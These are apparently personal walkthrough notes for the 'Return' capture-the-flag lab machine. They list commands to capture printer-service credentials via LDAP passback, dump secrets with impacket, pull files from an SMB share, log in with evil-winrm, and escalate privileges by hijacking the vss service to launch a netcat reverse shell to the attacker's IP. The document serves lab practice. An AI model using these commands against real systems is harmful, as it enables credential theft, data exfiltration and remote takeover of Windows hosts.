Return

- LDAP Passback Attack svc-printer : [redacted] Domain: RETURN - Get NTLM and other info nmap --script ldap-ntlm-info <> - mscl impacket-secretsdump RETURN/svc-printer:[redacted]@10.10.11.108 - Downloading recursively from an SMB share smbclient -U 'svc-printer%[redacted]' //10.10.11.108/C$ RECURSE ON PROMPT OFF mget * # 5985/5986 [WinRM] evil-winrm -u 'svc-printer' -p '[redacted]' -i 10.10.11.108 - Get user info net user svc-printer - User is part of server operators group https://cube0x0.github.io/Pocing-Beyond-DA/ - Privilege Escalation evil-winrm -u 'svc-printer' -p '[redacted]' -i 10.10.11.108 net user svc-printer upload /usr/share/windows-resource/binaries/nc.exe sc.exe config vss binpath="C:\Users\svc-printer\Downloads\nc.exe -e cmd.exe 10.10.14.30 7908" sc.exe stop vss sc.exe start vss ======================================= OBS: ======================================= • null credentials? • Got valid domain credentials from LDAP Passback attack